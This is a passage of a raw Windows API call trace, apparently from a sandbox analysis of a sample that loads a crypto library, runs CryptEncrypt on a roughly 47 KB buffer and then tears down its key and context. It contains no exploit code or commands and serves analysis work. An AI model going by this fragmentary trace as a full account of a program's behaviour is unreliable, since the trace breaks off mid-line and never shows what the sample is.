HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0197.105] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c26d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0197.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0197.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0197.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0197.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0197.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0197.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0197.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0197.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0197.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0197.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0197.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0197.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0197.106] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.106] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.106] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.107] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0197.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0197.107] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.107] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0197.107] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.107] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.107] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.107] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0197.107] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.107] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0197.107] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.108] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0197.108] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.109] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xb964, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xb970) returned 1 [0197.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.109] CharLowerBuffW (in: lpsz="byte[47473]", cchLength=0xb | out: lpsz="byte[47473]") returned 0xb [0197.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.111] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.111] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.111] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.112] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb964, dwBufLen=0xb970 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb970) returned 1 [0197.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.114] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.114] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.114] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.114] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.115] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.115] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.115] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0197.115] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.115] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.115] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.115] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0197.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.123] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0197.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.123] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.124] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.124] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0197.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.124] CryptDestroyKey (hKey=0x90aed8) returned 1 [0197.124] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.124] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.124] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0197.124] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0197.124] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0197.124] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0197.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0197.125] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.125] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0197.125] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0197.125] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0197.125] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.130] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.130] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.130] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0197.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.130] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.130] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.130] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.130] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.131] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.131] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0197.131] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.131] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.131] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0197.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.131] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.131] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0197.131] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.131] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.131] FreeLibrary (hLibModule=0x74f20000) returned 1 [0197.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0197.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0197.132] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, 